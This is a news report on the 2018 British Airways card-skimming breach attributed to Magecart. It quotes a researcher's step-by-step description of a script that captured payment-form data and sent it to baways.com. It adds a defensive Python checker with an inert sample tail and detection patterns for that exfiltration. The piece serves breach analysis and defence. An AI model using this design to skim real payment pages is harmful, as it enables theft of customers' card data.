RiskIQ's Yonathan Klijnsma said in a blog post on Tuesday that the BA report on the breach had mentioned the theft of customer data directly from payment forms, and this was why his company had suspected Magecart.
He said BA had mentioned that payments through both its main website and its mobile app were affected, and that the affected period ran from 22:58 BST on 21 August (7.58am AEST, 22 August) until 21:45 BST on 5 September (6.45am AEST, 6 September).
"To clear something up for those reporting on my latest story: Yes Modernizr is a 3rd party library but it was self-hosted on the BA servers. This means the actors modified a script on the server, which makes this a direct compromise of BA infrastructure, not a 3rd party."
— Yonathan Klijnsma (@ydklijnsma), September 11, 2018
Klijnsma said since 2016, RiskIQ had publicised the spread of devices known as card skimmers — hidden within credit card readers on ATMs, petrol pumps and other machines where people paid with credit cards — to steal credit card data. "Magecart uses a digital variety of these devices," he added.
The modified script was loaded by the baggage claim information page on the BA website; the change had been made right at the bottom of the file so as not to break its functionality. This made RiskIQ suspect that it could be the means of theft.
The modification dates of the two scripts — the original safe one and the newer malicious one — showed when people had started getting their payments stolen.
"A ton of people have been asking us about confidence on Magecart for British Airways as it 'doesn't look like the older stuff'. Magecart is not 1 group, Magecart is the umbrella name for multiple groups in fact. We'll have a large report in a month or so explaining the timeline."
— Yonathan Klijnsma (@ydklijnsma), September 12, 2018
Outlining what the malicious script did, Klijnsma said: "Once every element on the page finishes loading it will:
- Bind the mouseup and touchend events on a button known as submitButton with the following callback-code;
- Serialise the data in a form with id paymentForm into a dictionary;
- Serialise an item on the page with id personPaying into the same dictionary as the paymentForm information;
- Make a text-string out of this serialised data; and
- Send the data in the form of JSON to a server hosted on baways.com."
He pointed out that on websites, mouseup and touchend were events for when someone let go of the mouse after clicking on a button or when someone on a touchscreen (mobile) device let go of the screen after pushing a button.
"This means that once a user hits the button to submit their payment on the compromised British Airways site, the information from the payment form is extracted along with their name and sent to the attacker’s server. This attack is a simple, but highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer which grabbed forms indiscriminately.
"This particular skimmer is very much attuned to how British Airways' payment page is set up, which tells us that the attackers carefully considered how to target this site instead of blindly injecting the regular Magecart skimmer."
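The facts above (a self-hosted library modified at the bottom, a callback bound to mouseup/touchend on submitButton, the paymentForm and personPaying elements, and an exfiltration host outside the site's own domain) give a defender a concrete check to run against served scripts. The following is an added example, not RiskIQ's or BA's code: it compares a served copy of a script against its known-good baseline via its Subresource Integrity hash, isolates anything appended after the baseline, and reports the indicators named in the report. The library stand-in, the appended tail and the britishairways.com allowlist are constructed for the example.

```python
import base64
import hashlib
import re

# Constructed sample: a stand-in for a self-hosted library file, plus a copy
# with a block appended at the bottom. The tail is inert illustrative text
# carrying the indicators from the report, not a working skimmer.
CLEAN_SCRIPT = "/*! modernizr stand-in (constructed) */\nwindow.Modernizr = {};\n"
TAMPERED_SCRIPT = CLEAN_SCRIPT + (
    "// constructed tail\n"
    'onload: bind("mouseup touchend", submitButton); '
    "serialize(paymentForm, personPaying); "
    'post(JSON, "https://baways.com/");\n'
)
# Assumed allowlist of hosts the payment page may legitimately contact.
ALLOWED_HOSTS = {"britishairways.com", "www.britishairways.com"}

EVENT_RE = re.compile(r"\b(mouseup|touchend)\b")
ID_RE = re.compile(r"\b(submitButton|paymentForm|personPaying)\b")
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def sri_hash(content: str) -> str:
    """Subresource Integrity value (sha384) for a script body."""
    digest = hashlib.sha384(content.encode("utf-8")).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")


def appended_tail(baseline: str, candidate: str) -> str:
    """Bytes added after the known-good content, or '' if the candidate is
    not simply the baseline with something appended at the bottom."""
    return candidate[len(baseline):] if candidate.startswith(baseline) else ""


def assess(baseline: str, candidate: str, allowed=ALLOWED_HOSTS) -> dict:
    """Compare a served script with its baseline and summarise why the
    change looks like a form skimmer rather than a benign update."""
    modified = sri_hash(baseline) != sri_hash(candidate)
    tail = appended_tail(baseline, candidate) if modified else ""
    scope = candidate if modified else ""  # scan the whole file, not just the tail
    events = sorted(set(EVENT_RE.findall(scope)))
    ids = sorted(set(ID_RE.findall(scope)))
    hosts = sorted({h.lower() for h in HOST_RE.findall(scope)} - allowed)
    verdict = "skimmer-like" if (events and ids and hosts) else (
        "modified" if modified else "clean")
    return {"modified": modified, "appended_only": bool(tail), "tail": tail,
            "events": events, "form_ids": ids, "external_hosts": hosts,
            "verdict": verdict}


if __name__ == "__main__":
    print(assess(CLEAN_SCRIPT, TAMPERED_SCRIPT))
```

Pinning the same sha384 value in the page's `<script integrity="...">` attribute makes the browser refuse a tampered copy outright, so the hash serves both as a monitoring baseline and as an enforcement control.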
Klijnsma suggested that those who suspected they were part of the 380,000 affected customers should obtain new credit cards right away.